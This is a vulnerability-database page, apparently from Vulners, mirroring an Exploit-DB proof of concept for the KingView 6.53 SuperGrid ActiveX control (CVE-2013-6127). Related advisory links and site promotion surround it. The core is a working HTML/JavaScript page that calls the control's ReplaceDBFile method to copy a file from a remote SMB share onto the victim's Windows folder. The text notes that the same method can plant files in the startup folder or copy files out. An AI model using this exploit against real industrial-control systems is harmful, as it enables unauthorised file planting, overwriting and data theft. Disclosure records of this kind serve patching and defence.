Lucene search
+L

KingView 6.53 - 'SuperGrid' Insecure ActiveX Control

🗓️ 04 Sep 2013 00:00:00Reported by blakeType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 47 Views

KingView 6.53 'SuperGrid' ActiveX Control allows arbitrary file cop

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2013-6127
4 Sep 201300:00
circl
cve
CVE
CVE-2013-6127
25 Oct 201320:00
cve
cvelist
Cvelist
CVE-2013-6127
25 Oct 201320:00
cvelist
d2
d2
DSquare Exploit Pack: D2SEC_KINGVIEW
25 Oct 201320:55
d2
euvd
EUVD
EUVD-2013-5956
7 Oct 202500:30
euvd
ics
ICS
WellinTech KingView ActiveX Vulnerabilities
25 Jul 201306:00
ics
nvd
NVD
CVE-2013-6127
25 Oct 201320:55
nvd
prion
Prion
Directory traversal
25 Oct 201320:55
prion
redhatcve
RedhatCVE
CVE-2013-6127
7 Jan 202609:51
redhatcve
nessus
Tenable Nessus
WellinTech KingView ActiveX Multiple Arbitrary File Overwrite Vulnerabilities
3 Oct 201300:00
nessus
<html>
<object classid='clsid:F494550F-A028-4817-A7B5-E5F2DCB4A47E' id='target'></object>
<!--
KingView Insecure ActiveX Control - SuperGrid
Vendor: http://www.wellintech.com
Version: KingView 6.53
Tested on: Windows XP SP3 / IE
Download: http://www.wellintech.com/documents/KingView6.53_EN.zip
Author: Blake

CLSID: F494550F-A028-4817-A7B5-E5F2DCB4A47E
ProgId: SUPERGRIDLib.SuperGrid
Path: C:\Program Files\KingView\SuperGrid.ocx
MemberName: ReplaceDBFile
Safe for scripting: False
Safe for init: False
Kill Bit: False
IObject safety not implemented
-->
<title>KingView Insecure ActiveX Control Proof of Concept - SuperGrid.ocx</title>
<p>This proof of concept will copy any arbritrary file from one location to a second location. A malicious user may be able to use this to copy a file from an attacker controlled share to the target or from the target to an attacker controlled system (ie from an attacker share to the startup folder). It can also be used to overwrite existing files.</p>

<input type=button onclick="copyfile()" value="Do It!">
<script>
function copyfile()
{
	var file1 = "\\\\192.168.1.165\\share\\poc.txt"; 			//source
	var file2 = "c:\\WINDOWS\\poc.txt"; 					//destination
	result = target.ReplaceDBFile(file1,file2);
}

</script>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 Sep 2013 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 25.8
EPSS0.13854
47